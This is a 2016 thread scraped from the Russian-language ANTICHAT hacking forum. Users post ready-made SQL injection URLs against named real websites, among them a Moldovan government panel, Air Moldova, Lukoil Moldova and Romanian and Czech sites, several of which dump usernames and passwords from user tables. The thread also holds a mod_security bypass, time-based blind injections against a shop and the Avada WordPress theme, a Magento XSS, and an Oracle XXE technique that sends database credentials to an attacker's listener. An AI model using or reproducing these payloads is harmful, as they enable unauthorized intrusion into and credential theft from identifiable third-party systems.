ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.01.2016, 17:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 3616
Репутация:
1
|
|
|
|
|
|

22.01.2016, 23:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 4014
Репутация:
2
|
|
SQL-i, обход mod_security
Код:
Code:
http://thewallis.org/showinfo.php?id=-1+/*!50000UNION+select+null,concat_ws%280x3a,TABLE_NAME,%20COLUMN_NAME%29+/**/FROM+/**/INFORMATION_SCHEMA.COLUMNS/**/+LIMIT+0,800*/
|
|
|
|

17.02.2016, 17:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 585
Репутация:
1
|
|
|
|
|
|

17.02.2016, 18:31
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
небольшие проблемы с хостингом и рейтингом, пока восстанавливаю
|
|
|

19.02.2016, 23:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Сайт: http://www.bri.gov.md/panel/login.php
Уязвимость: Отменяем редирект
Эксплойт:
Сайт: http://www.stroika.md/
Уязвимость: SQL injection
Эксплойт:
Код:
Code:
http://www.stroika.md/detail.php?id=1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
Сайт: http://www.calidus.ro/
Уязвимость: SQL injection
Эксплойт:
Код:
Code:
http://www.calidus.ro/en/news.php?id=-1+UNION+SELECT+1%2Cusername%2C3%2Cuser_password+FROM+users
Сайт: http://lukoil.md/ro/search_result
Уязвимость: SQL injection (Post SQL-inj в поиске)
Эксплойт:
Код:
Code:
-1' UNION SELECT 1,2,user(),4,5,6 --
Сайт: http://mobile.airmoldova.md/
Уязвимость: SQL injection
Эксплойт:
Код:
Code:
http://mobile.airmoldova.md/special-offers-ru/?item=-9179)+UNION+SELECT+1,2,3,4,5,user_login,7,8,9,10,11,12,13,user_password,15,16,17,18,19,20,21,22,23,24,25+FROM+users+--+
Сайт: http://www.infocom.md/
Уязвимость: SQL injection
Эксплойт:
Код:
Code:
http://www.infocom.md/evenimente.php?id=13+UNION+SELECT+1,2,user(),version()+--+
Сайт: http://investigatii.md/
Уязвимость: SQL injection
Эксплойт:
Код:
Code:
http://investigatii.md/eng/comments.php?id=258+union+select+1,2,version(),user(),5,6,7,8,9,database(),11,12,13,14
|
|
|
|

06.03.2016, 23:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Невидимая ЭскуЭль инъекция
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//parfume.in.ua/parfumes.php?Gabanna&designer=DG&designers=Dolce&sort=1+and+sleep(12)+--+-[/COLOR][/COLOR]
АштиМиЭль Всовывание
[PHP]
PHP:
[COLOR="#000000"] http:[COLOR="#FF8000"]//shops.ixi.ua/goods.php?goods=hello
mir
|
|
|
|

18.03.2016, 15:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 3428
Репутация:
0
|
|
Сообщение от None
select extractvalue(xmltype(']>'|| '&' ||'xxe;'),'/l') from dual;
Возникает следующая ошибка:
ORA-31020: The operation is not allowed,
Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.
select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;
При запуске запроса выше на сервере баз данных возникнет та же сама ошибка (ORA-31020). Однако в этот раз сервер отсылает HTTP-запрос на ресурс с именем «test». Ниже приведен лог HTTP-запросов с сервера злоумышленника:
ncat -lvp 80
Ncat: Version 6.25 (
http://nmap.org/ncat
)
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8
select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;
После запуска запроса возникает следующая ошибка (обратите внимание, что код ошибки отличается, поскольку предоставленные учетные данные не могут быть использованы для авторизации на удаленном FTP-сервере).
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:bar@IP/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.
Имя пользователя базы данных включено в FTP-трафик и отсылается на сервер злоумышленника как имя пользователя FTP-сервера:
СКРИН НЕ ВЫХОДИТ ЗАЛИТЬ ХЗ МОЖЕТ ПРАВ НЕ ХВАТАЕТ ....
|
|
|
|

18.03.2016, 16:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Тема для Wordpress
Avada #1 Selling Theme of All Time ( 190,000+ Satisfied Customers)
inurl:"product_orderby" ( Результатов: примерно 8 840 000 (0,63 сек.))
./includes/woo-config.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ( isset([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] ) ) { [/COLOR][COLOR="#0000BB"]parse_str[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]); } [/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]= ! empty([/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'product_order'[/COLOR][COLOR="#007700"]] ) ?[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'product_order'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'desc'[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strtoupper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'orderby'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]"sum_of_comments_approved DESC, average_rating[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$order[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]posts[/COLOR][COLOR="#DD0000"].post_date DESC"[/COLOR][COLOR="#007700"]; [/COLOR][/COLOR]
Получается Time-Based Blind SQL Injection:
Сообщение от None
http:// site.com/shop/?product_orderby=rating&product_order=DESC,CASE+1+ WHEN+ASCII(substring(version(),1,1))=53+THEN+SLEEP (0)+ELSE+SLEEP(1)+END+ASC+--+1
В тонкости не вдавался, похоже что спит так: количество сортируемых товаров * sleep(). Подверженные версии, скорее всего,
|
|
|
|

18.03.2016, 17:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
MagentoDownloader - 1.x
Reflected XSS
./downloader.php:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]public function[/COLOR][COLOR="#0000BB"]validateAction[/COLOR][COLOR="#007700"]() { ...
if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'checkdb'[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPost[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPost[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'database'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPost[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'database'[/COLOR][COLOR="#007700"]);
...
public function[/COLOR][COLOR="#0000BB"]getPost[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]) { if ([/COLOR][COLOR="#0000BB"]is_null[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"])) { return[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]; } if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]])) { return[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]]; } return[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]; } ...
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]printHtmlValidateBlock[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_session[/COLOR][COLOR="#007700"]);
...
public function[/COLOR][COLOR="#0000BB"]printHtmlValidateBlock[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'localhost'[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]= !empty([/COLOR][COLOR="#0000BB"]$session[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#DD0000"]'******'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; echo Database Connection Database Connection Host
User Name
User Password
[/COLOR][COLOR="#007700"]HTML; echo[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]printHtmlButtonSet[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]'checkdb'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Check for InnoDB support'[/COLOR][COLOR="#007700"])); echo [/COLOR][COLOR="#007700"]HTML; } [/COLOR][/COLOR]
FPD
[QUOTE="None"]
Warning: PDO::__construct(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/downloader.php on line 191
Warning: PDO::__construct(): [2002] php_network_getaddresses: getaddrinfo failed: Name or service not known (trying to connect via tcp://">[/COLOR] _connection= newPDO($dsn,$username,$password);
} catch (PDOException $e) {
$this->addError('Access denied for user '.$username.'@'.$host);
}
return$this;
}
[/COLOR]
[/PHP]
|
|
|
|

07.04.2016, 18:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от dmb_cv
dmb_cv said:
↑
sql inj
сайт dogarchive.kennel-apbt.com
называется найди уязвимость)?
читайте правила оформления постов
Сайт: http://pedigree.gamedogs.cz
Уязвимость: SQL Injection
Код:
Code:
http://pedigree.gamedogs.cz/managePerson.php?personId=-966+union+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12+--+s
10.0.23-MariaDB-0+deb8u1
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|